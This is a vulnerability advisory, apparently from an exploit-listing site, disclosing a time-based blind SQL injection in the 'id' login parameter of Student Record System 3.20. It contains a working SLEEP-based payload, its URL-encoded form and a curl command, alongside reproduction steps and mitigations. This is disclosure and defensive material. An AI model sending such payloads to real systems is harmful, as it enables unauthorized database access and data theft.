Student Record System 3.20 - 'id' Parameter Time-based Blind SQL Injection

2025.10.21
Credit: Şeyma Yaldız
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

Tested locally on localhost; the vulnerability is remotely exploitable if the server is bound to a network interface. Exploit Title: Student Record System 3.20 - 'id' Parameter Time-based SQL Injection Date: 2025-10-21 Exploit Author: Şeyma Yaldız Vendor Homepage: https://phpgurukul.com/student-record-system-php/ Target (example): http://localhost:8080/studentrecordms/login.php Version: 3.20 Tested on: Windows, XAMPP / Kali Linux CVE: N/A CWE: CWE-89 (SQL Injection) Remote: Yes Local: No Short description: A time-based blind SQL injection exists in the POST parameter `id` of /studentrecordms/login.php. Injecting a payload that uses MySQL's SLEEP() causes measurable backend delays, confirming blind SQLi and enabling blind data extraction techniques. Vulnerability details: - Affected component: login module - Endpoint: /studentrecordms/login.php - HTTP Method: POST - Affected parameter: `id` (application/x-www-form-urlencoded) Minimal Proof-of-Concept (human-readable): POST /studentrecordms/login.php HTTP/1.1 Host: localhost:8080 Content-Type: application/x-www-form-urlencoded id=' AND (SELECT 9104 FROM (SELECT(SLEEP(15)))VHur)-- vPWX&password=test&submit=login URL-encoded payload (for tools / curl): id=%27%20AND%20%28SELECT%209104%20FROM%20%28SELECT%28SLEEP%2815%29%29%29VHur%29--%20vPWX curl example: curl -s -X POST "http://localhost:8080/studentrecordms/login.php" \ -H "Content-Type: application/x-www-form-urlencoded" \ --data "id=%27%20AND%20%28SELECT%209104%20FROM%20%28SELECT%28SLEEP%2815%29%29%29VHur%29--%20vPWX&password=test&submit=login" \ -w "\nHTTP_CODE:%{http_code}\nTIME_TOTAL:%{time_total}\n" Reproduction Steps: 1. Host the application on an isolated test instance (do NOT target live/third-party sites). 2. Send the POST request above (curl / Burp / requests) and measure response time. 3. Adjust the sleep value to confirm reliability. Consistent ~N second delays indicate a successful time-based blind SQLi. Impact: - Time-based blind SQLi may allow data extraction, authentication bypass, or other high-impact attacks depending on database privileges. - Preliminary severity: High. Mitigation: - Use parameterized queries / prepared statements for all database interactions. - Implement strict server-side input validation and allowlisting. - Operate database accounts with least privilege. - Avoid exposing database error messages to end users. Notes: - PoC targets example/test host only (localhost:8080). Replace with test instance URL. - Test only systems you own or have explicit permission to test. - Contact: Şeyma Yaldız

Referencje:

Vendor:
https://phpgurukul.com/student-record-system-php/
Exploit-DB: N/A


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2025, cxsecurity.com

 

Back to Top